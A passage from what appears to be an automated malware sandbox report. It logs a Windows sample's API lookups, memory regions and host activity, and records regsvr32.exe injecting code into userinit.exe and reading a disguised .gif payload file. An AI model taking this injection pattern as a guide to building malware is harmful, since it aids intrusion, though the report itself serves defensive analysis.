Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d6e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d6e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d6e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #61: userinit.exe

222

0

»

Information	Value
ID	#61
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:59, Reason: Child Process
Unmonitor	End Time: 00:04:03, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xa80
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A84 0x 9A4 0x 9C0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x0006ffff	Private Memory	rw	-
pagefile_0x0000000000070000	0x00070000	0x00073fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	r	-
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	rw	-
private_0x00000000000a0000	0x000a0000	0x0019ffff	Private Memory	rw	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
pagefile_0x0000000000210000	0x00210000	0x002d7fff	Pagefile Backed Memory	r	-
private_0x00000000002e0000	0x002e0000	0x002e0fff	Private Memory	rwx	-
pagefile_0x00000000002f0000	0x002f0000	0x002f6fff	Pagefile Backed Memory	r	-
private_0x0000000000300000	0x00300000	0x0030ffff	Private Memory	rw	-
pagefile_0x0000000000310000	0x00310000	0x003eefff	Pagefile Backed Memory	r	-
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x0000000000680000	0x00680000	0x0068ffff	Private Memory	rw	-
private_0x0000000000690000	0x00690000	0x0088ffff	Private Memory	rw	-
private_0x0000000000690000	0x00690000	0x0070ffff	Private Memory	rw	-
private_0x0000000000710000	0x00710000	0x0081cfff	Private Memory	rw	-
oleaccrc.dll	0x00820000	0x00820fff	Memory Mapped File	r	-
private_0x0000000000830000	0x00830000	0x00830fff	Private Memory	rwx	-
pagefile_0x0000000000840000	0x00840000	0x00841fff	Pagefile Backed Memory	r	-
private_0x0000000000850000	0x00850000	0x0088ffff	Private Memory	rw	-
private_0x0000000000890000	0x00890000	0x00abffff	Private Memory	rw	-
private_0x0000000000890000	0x00890000	0x0098ffff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a10fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a14fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a18fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a1cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a20fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a24fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a28fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a2cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a30fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a34fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a38fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a3cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a40fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a44fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a48fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a4cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a50fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a54fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a58fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a5cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a60fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a64fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a68fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a6cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a70fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a74fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a78fff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x00a7cfff	Private Memory	rw	-
private_0x0000000000a80000	0x00a80000	0x00abffff	Private Memory	rw	-
private_0x0000000000ac0000	0x00ac0000	0x00cbffff	Private Memory	rw	-
userinit.exe	0x00cf0000	0x00cf8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d00000	0x00d00000	0x018fffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01900000	0x0222ffff	Memory Mapped File	r	-
pagefile_0x0000000002230000	0x02230000	0x02622fff	Pagefile Backed Memory	r	-
private_0x0000000002630000	0x02630000	0x026b2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026b6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026bafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026befff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026c2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026c6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026cafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026cefff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026d2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026d6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026dafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026defff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026e2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026e6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026eafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026eefff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026f2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026f6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026fafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026fefff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02702fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02706fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0270afff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0270efff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02712fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02716fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0271afff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0271efff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02724fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02728fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0272cfff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02732fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02736fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0273afff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0273ffff	Private Memory	-	-
private_0x0000000002720000	0x02720000	0x02810fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02826fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282efff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02844fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02848fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0284cfff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02912fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02930fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02962fff	Private Memory	rwx	-
private_0x0000000002970000	0x02970000	0x02a6ffff	Private Memory	-	-
private_0x0000000002af0000	0x02af0000	0x02b2ffff	Private Memory	rw	-
private_0x0000000002c30000	0x02c30000	0x02d2ffff	Private Memory	rw	-
sortdefault.nls	0x02d30000	0x02ffefff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffde008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xa84, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = tð, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
